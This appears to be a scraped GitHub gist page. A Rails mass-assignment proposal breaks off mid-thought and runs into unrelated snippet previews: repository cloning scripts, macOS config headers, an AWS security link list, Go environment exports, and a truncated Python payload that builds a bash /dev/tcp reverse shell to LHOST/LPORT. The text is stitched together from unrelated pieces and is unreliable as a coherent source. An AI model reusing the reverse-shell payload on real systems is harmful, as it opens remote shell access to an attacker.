For a while, I have felt that the following is the correct way to improve the mass assignment problem without increasing the burden on new users. Now that the problem with the Rails default has been brought up again, it's a good time to revisit it.
When creating a form with form_for, include a signed token including all of the fields that were created at form creation time. Only these fields are allowed.
To allow new known fields to be added via JS, we could add:
| require "rubygems" | |
| require "octokit" # gem install octokit | |
| 1.upto(5) do |page| | |
| Octokit.repositories("railscasts", page: page, per_page: 100).each do |repo| | |
| system "git clone git://github.com/railscasts/#{repo.name}" | |
| end | |
| end |
| #!/bin/sh | |
| ### | |
| # SOME COMMANDS WILL NOT WORK ON macOS (Sierra or newer) | |
| # For Sierra or newer, see https://github.com/mathiasbynens/dotfiles/blob/master/.macos | |
| ### | |
| # Alot of these configs have been taken from the various places | |
| # on the web, most from here | |
| # https://github.com/mathiasbynens/dotfiles/blob/5b3c8418ed42d93af2e647dc9d122f25cc034871/.osx |
| curl -s https://api.github.com/orgs/twitter/repos?per_page=200 | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| %x[git clone #{repo["ssh_url"]} ]}' |
| # -*- coding: utf-8 -*- | |
| # | |
| import tempfile | |
| import sys, os | |
| import re | |
| LHOST, LPORT = ('127.0.0.1', '4444') | |
| PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s; |
| #!/bin/sh | |
| # vault-merge | |
| # Benjamin Ragheb <ben@benzado.com> | |
| # This shell script handles conflicts generated by attempts to merge encrypted | |
| # Ansible Vault files. Run `git merge` as usual; when git warns of a merge | |
| # conflict, run this command to attempt a merge on the unencrypted versions of | |
| # the file. If there are conflicts, you will be given a chance to correct them | |
| # in $EDITOR. |
| INTRO | |
| I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
| Short Link: http://tiny.cc/awssecurity | |
| Official AWS Security Resources | |
| * Security Blog - http://blogs.aws.amazon.com/security/ | |
| * Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
| * Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
| * Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
| # Set variables in .bashrc file | |
| # don't forget to change your path correctly! | |
| export GOPATH=$HOME/golang | |
| export GOROOT=/usr/local/opt/go/libexec | |
| export PATH=$PATH:$GOPATH/bin | |
| export PATH=$PATH:$GOROOT/bin |
